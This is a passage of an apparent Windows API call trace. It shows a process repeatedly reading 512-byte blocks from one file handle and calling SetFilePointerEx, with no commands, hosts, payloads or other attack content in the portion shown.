liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.722] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.723] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.724] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.725] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.726] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.727] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.728] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.729] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
